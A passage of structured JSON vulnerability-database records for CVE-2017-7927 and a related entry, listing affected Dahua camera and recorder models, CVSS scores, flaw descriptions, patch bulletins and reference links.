"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdbw23a0rn-zs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdbw13a0sn_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdbw13a0sn:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw1xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw2xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw4xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw1xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw2xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw4xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd6cxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd6cxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-nvr1xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-nvr1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-hcvr4xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ddh-hcvr4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-hcvr5xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-hcvr5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr51a04he-s3_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr51a04he-s3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr51a08he-s3_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr51a08he-s3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr58a32s-s2_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr58a32s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-7927"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Bashis",
"sources": [
{
"db": "BID",
"id": "98312"
}
],
"trust": 0.3
},
"cve": "CVE-2017-7927",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-7927",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-06997",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "f9954bac-60c9-435b-9538-cebe46db3539",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-116130",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "Low",
"baseScore": 7.3,
"baseSeverity": "High",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2017-7927",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-7927",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-06997",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201704-1043",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "f9954bac-60c9-435b-9538-cebe46db3539",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-116130",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "f9954bac-60c9-435b-9538-cebe46db3539"
},
{
"db": "CNVD",
"id": "CNVD-2017-06997"
},
{
"db": "VULHUB",
"id": "VHN-116130"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003972"
},
{
"db": "NVD",
"id": "CVE-2017-7927"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1043"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Dahua The product contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dahua Technology Authentication is an access control reader produced by Dahua Technology. Dahua Technology Authentication has an authentication vulnerability. An attacker could exploit the vulnerability to gain unauthorized access to restricted content by bypassing expected security restrictions. Dahua DH-IPC-HDBW23A0RN-ZS, etc. are all camera products of Dahua Company in China. A security vulnerability exists in several Dahua products due to the program\u0027s use of password hashes instead of passwords to perform authentication. The following products are affected: Dahua DH-IPC-HDBW23A0RN-ZS; DH-IPC-HDBW13A0SN; DH-IPC-HDW1XXX; DH-IPC-HDW2XXX; DH-IPC-HDW4XXX; DH-IPC-HFW4XXX; DH-SD6CXX; DH-NVR1XXX; DH-HCVR4XXX; DH-HCVR5XXX; DHI-HCVR51A04HE-S3; DHI-HCVR51A08HE-S3;",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003972"
},
{
"db": "CNVD",
"id": "CNVD-2017-06997"
},
{
"db": "BID",
"id": "98312"
},
{
"db": "VULHUB",
"id": "VHN-116130"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-7927",
"trust": 3.6
},
{
"db": "ICS CERT",
"id": "ICSA-17-124-02",
"trust": 2.8
},
{
"db": "BID",
"id": "98312",
"trust": 2.6
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1043",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2017-06997",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU98841854",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003972",
"trust": 0.8
},
{
"db": "IVD",
"id": "F9954BAC-60C9-435B-9538-CEBE46DB3539",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-116130",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "f9954bac-60c9-435b-9538-cebe46db3539"
},
{
"db": "CNVD",
"id": "CNVD-2017-06997"
},
{
"db": "VULHUB",
"id": "VHN-116130"
},
{
"db": "BID",
"id": "98312"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003972"
},
{
"db": "NVD",
"id": "CVE-2017-7927"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1043"
}
]
},
"id": "VAR-201705-3744",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "f9954bac-60c9-435b-9538-cebe46db3539"
},
{
"db": "CNVD",
"id": "CNVD-2017-06997"
},
{
"db": "VULHUB",
"id": "VHN-116130"
}
],
"trust": 1.5166666600000003
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"ICS"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "f9954bac-60c9-435b-9538-cebe46db3539"
},
{
"db": "CNVD",
"id": "CNVD-2017-06997"
}
]
},
"last_update_date": "2023-12-18T12:29:39.729000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Cybersecurity Statement - March 6th 2017",
"trust": 0.8,
"url": "http://www.dahuasecurity.com/en/us/single.php?nid=354"
},
{
"title": "Cybersecurity Vulnerability Update - March 8 2017",
"trust": 0.8,
"url": "http://www.dahuasecurity.com/en/us/single.php?nid=364"
},
{
"title": "Cyber Vulnerability Affecting Certain Dahua IP Cameras and Recorders (030617)",
"trust": 0.8,
"url": "http://us.dahuasecurity.com/en/us/security-bulletin_030617.php"
},
{
"title": "Cyber Vulnerability Affecting Certain Dahua IP Cameras and Recorders (04032017)",
"trust": 0.8,
"url": "http://us.dahuasecurity.com/en/us/security-bulletin_04032017.php"
},
{
"title": "Security Notification DHCC-201703-01",
"trust": 0.8,
"url": "http://www1.dahuasecurity.com/annoucementsingle/security-notification-dhcc-201703-01-112.html"
},
{
"title": "Patch for Dahua Technology Authentication Authentication Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/93997"
},
{
"title": "Repair measures for various UOB product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99752"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-06997"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003972"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1043"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.9
},
{
"problemtype": "CWE-836",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-116130"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003972"
},
{
"db": "NVD",
"id": "CVE-2017-7927"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-17-124-02"
},
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/98312"
},
{
"trust": 1.7,
"url": "http://us.dahuasecurity.com/en/us/security-bulletin_030617.php"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7927"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7927"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu98841854/index.html"
},
{
"trust": 0.8,
"url": "https://github.com/mcw0/poc/blob/master/dahua-backdoor.txt"
},
{
"trust": 0.8,
"url": "https://github.com/mcw0/poc/blob/master/dahua-backdoor-poc.py"
},
{
"trust": 0.3,
"url": "www.dahuasecurity.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-06997"
},
{
"db": "VULHUB",
"id": "VHN-116130"
},
{
"db": "BID",
"id": "98312"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003972"
},
{
"db": "NVD",
"id": "CVE-2017-7927"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1043"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "f9954bac-60c9-435b-9538-cebe46db3539"
},
{
"db": "CNVD",
"id": "CNVD-2017-06997"
},
{
"db": "VULHUB",
"id": "VHN-116130"
},
{
"db": "BID",
"id": "98312"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003972"
},
{
"db": "NVD",
"id": "CVE-2017-7927"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1043"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-05-19T00:00:00",
"db": "IVD",
"id": "f9954bac-60c9-435b-9538-cebe46db3539"
},
{
"date": "2017-05-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-06997"
},
{
"date": "2017-05-06T00:00:00",
"db": "VULHUB",
"id": "VHN-116130"
},
{
"date": "2017-05-04T00:00:00",
"db": "BID",
"id": "98312"
},
{
"date": "2017-06-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003972"
},
{
"date": "2017-05-06T00:29:00.460000",
"db": "NVD",
"id": "CVE-2017-7927"
},
{
"date": "2017-04-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-1043"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-06997"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-116130"
},
{
"date": "2017-05-23T16:23:00",
"db": "BID",
"id": "98312"
},
{
"date": "2017-07-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-003972"
},
{
"date": "2019-10-09T23:29:59.297000",
"db": "NVD",
"id": "CVE-2017-7927"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-1043"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-1043"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua Technology Authentication Authentication vulnerability",
"sources": [
{
"db": "IVD",
"id": "f9954bac-60c9-435b-9538-cebe46db3539"
},
{
"db": "CNVD",
"id": "CNVD-2017-06997"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-1043"
}
],
"trust": 0.6
}
}
VAR-201705-3743
Vulnerability from variot - Updated: 2023-12-18 12:29A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information. plural Dahua The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dahua DH-IPC-HDBW23A0RN-ZS is a camera product of Dahua Company of China. Dahua Technology is prone to an authentication-bypass vulnerability and an information-disclosure vulnerability. Attackers may exploit these issues to gain unauthorized access to restricted content by bypassing intended security restrictions or to obtain sensitive information that may aid in launching further attacks. Dahua DH-IPC-HDBW23A0RN-ZS, etc. There are security vulnerabilities in many Dahua products. The following products are affected: Dahua DH-IPC-HDBW23A0RN-ZS; DH-IPC-HDBW13A0SN; DH-IPC-HDW1XXX; DH-IPC-HDW2XXX; DH-IPC-HDW4XXX; DH-IPC-HFW4XXX; DH-SD6CXX; DH-NVR1XXX; DH-HCVR4XXX; DH-HCVR5XXX; DHI-HCVR51A04HE-S3; DHI-HCVR51A08HE-S3;
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201705-3743",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dh-ipc-hfw2xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dhi-hcvr51a08he-s3",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dhi-hcvr51a04he-s3",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdbw23a0rn-zs",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-nvr1xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-hcvr4xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-hcvr5xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dhi-hcvr58a32s-s2",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-sd6cxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hfw4xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdbw23a0rn-zs",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdbw13a0sn",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdw1xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdw2xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdw4xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hfw1xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hfw2xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hfw4xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-sd6cxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-nvr1xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-hcvr4xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-hcvr5xxx",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dhi-hcvr51a04he-s3",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dhi-hcvr51a08he-s3",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dhi-hcvr58a32s-s2",
"scope": null,
"trust": 1.4,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdbw13a0sn",
"scope": "eq",
